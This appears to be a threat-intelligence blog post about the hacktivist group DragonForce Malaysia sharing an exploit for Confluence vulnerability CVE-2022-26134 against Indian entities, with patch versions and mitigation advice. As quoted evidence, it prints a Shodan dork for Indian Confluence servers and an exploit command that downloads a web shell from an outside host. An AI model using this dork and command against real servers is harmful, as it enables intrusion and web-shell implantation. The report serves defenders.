Hacktivist Group DragonForce Actively Targeting Indian Entities, Shares an Exploit for a Critical Confluence Server Vulnerability CVE-2022-26134

XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities.
Updated on
February 27, 2023
Published on
July 15, 2022
Read time
Subscribe to the latest industry news, technologies and resources.
Category: Adversary Intelligence Threat Type: Latest Attack Motivation: Hacktivist Region: India Source*: D4

Executive Summary

  • DragonForce Malaysia, the hacktivist group actively involved in targeting Indian entities, announced and shared the exploit CVE-2022-26134 which is a Confluence Server vulnerability.
  • The group has also shared a list of dorks targeting the Indian region on their Telegram channel.
  • Actors can scan the internet for vulnerable instances of Confluence servers and leverage this vulnerability to launch attacks against significant Indian entities owned by both the government and private sectors.
  • Look for patches and workarounds for the CVE-2022-26134.
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.
CloudSEK’s contextual AI digital risk platform XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability present in Confluence Server and Data Center. DragonForce posting updates on their Telegram channel

Analysis and Attribution

Information from Cybercrime Forums

  • On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:"IN"
  • The actor also shared a GitHub repository containing the script which can be downloaded and exploited using the following python command:
CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php
  • Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
  • A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
[caption id="attachment_20026" align="aligncenter" width="1350"]Cybercrime forum post discussing CVE-2022-26134 Cybercrime forum post discussing CVE-2022-26134[/caption]  

About DragonForce

  • On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
  • The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
  • The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
  • This group owns and operates a forum where they post announcements and discuss their latest activities.
  • The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
  • The group has been conducting regular recruitment and promotion campaigns using Tiktok and Instagram reels.

DragonForce’s Official Communication Channels

Forum : https[:]//dragonforce[.]io
Radio : https[:]//radio[.]dragonforce[.]io
Facebook : https[:]//fb[.]me/dragonforcedotio
Telegram : https[:]//t[.]me/dragonforceio
Twitter : https[:]//twitter[.]com/dragonforceio
Instagram : https[:]//instagram[.]com/dragonforceio
YouTube : https[:]//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw

Information from OSINT

  • Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
  • A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
[caption id="attachment_20027" align="aligncenter" width="316"]Source: Shodan Source: Shodan[/caption]  
  • The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
[caption id="attachment_20028" align="aligncenter" width="1274"]Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare) Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)[/caption]  

Impact & Mitigation

Impact Mitigation
  • DragonForce is associated with multiple hacktivist groups for their campaign against Indian entities. This exploit gives them more opportunities to deface and dump the database of Indian entities.
  • Attackers can use this vulnerability to execute commands remotely.
  • Threat actors can leverage this opportunity to target victims and deploy ransomware.
  • Potential loss of revenue, reputation, and intellectual property.
  • The Confluence Server and Data Center versions need to be updated to the following patched versions:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.



Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Related Intelligence Posts
No items found.